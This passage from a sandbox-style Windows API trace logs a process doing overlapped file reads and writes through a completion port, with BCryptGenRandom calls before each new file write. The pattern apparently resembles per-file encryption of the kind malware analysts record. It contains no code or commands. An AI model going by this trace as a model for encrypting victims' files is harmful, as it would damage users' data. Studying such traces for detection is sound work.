lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.565] CloseHandle (hObject=0x170) returned 1 [0199.565] free (_Block=0x3f70048) [0199.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.574] CloseHandle (hObject=0x2a4) returned 1 [0199.574] free (_Block=0x3e70008) [0199.574] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.589] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x47d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.598] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1f70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.603] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0199.653] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.654] CloseHandle (hObject=0x170) returned 1 [0199.655] free (_Block=0x3f70048) [0199.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.662] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.662] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.663] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.663] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.663] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.663] free (_Block=0x3e305b8) [0199.663] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.663] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.663] free (_Block=0x1fa91d0) [0199.664] free (_Block=0x1fa2ed8) [0199.664] free (_Block=0x1fa90b8) [0199.664] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.672] CloseHandle (hObject=0x3cc) returned 1 [0199.672] free (_Block=0x1ff1e60) [0199.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.675] CloseHandle (hObject=0x170) returned 1 [0199.675] free (_Block=0x3df0008) [0199.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.713] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.714] free (_Block=0x3e305b8) [0199.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.714] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.714] free (_Block=0x1fa91d0) [0199.714] free (_Block=0x1fa2ed8) [0199.714] free (_Block=0x1fa90b8) [0199.714] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.715] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.735] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc5e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.743] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd22, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.744] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.766] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.767] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x980, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0199.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.947] CloseHandle (hObject=0x3cc) returned 1 [0199.947] free (_Block=0x3df0008) [0199.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.955] CloseHandle (hObject=0x170) returned 1 [0199.956] free (_Block=0x1ff1e60) [0199.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.958] CloseHandle (hObject=0x338) returned 1 [0199.958] free (_Block=0x3d70450) [0199.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.968] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.968] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.968] free (_Block=0x3e305b8) [0199.968] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.968] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.968] free (_Block=0x1fa91d0) [0199.968] free (_Block=0x1fa2ed8) [0199.968] free (_Block=0x1fa90b8) [0199.968] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.977] CloseHandle (hObject=0x308) returned 1 [0199.977] free (_Block=0x3f70048) [0199.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.984] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x822, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.985] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.990] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x814, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.999] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.999] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.999] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.999] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0200.000] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.000] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.000] free (_Block=0x3e305b8) [0200.000] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.000] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.000] free (_Block=0x1fa91d0) [0200.000] free (_Block=0x1fa2ed8) [0200.000] free (_Block=0x1fa90b8) [0200.000] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0200.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.290] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.291] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.307] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3d5c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0200.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.324] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.790] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.791] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0200.799] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.799] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0200.799] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.799] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.799] free (_Block=0x3e305b8) [0200.799] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.800] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.800] free (_Block=0x1fa91d0) [0200.800] free (_Block=0x1fa2ed8) [0200.800] free (_Block=0x1fa90b8) [0200.800] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0200.800] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.801] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0200.801] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.836] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1552, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0200.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.854] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1136, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0200.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.868] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0200.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.869] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0200.869] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.869] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.869] free (_Block=0x3e305b8) [0200.869] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.869] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.869] free (_Block=0x1fa91d0) [0200.869] free (_Block=0x1fa2ed8) [0200.869] free (_Block=0x1fa90b8) [0200.870] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.871] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0200.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.871] CloseHandle (hObject=0x170) returned 1 [0200.871] free (_Block=0x3df0008) [0200.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0200.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0200.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0200.956] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.956] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.956] free (_Block=0x3e305b8) [0200.956] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.956] calloc 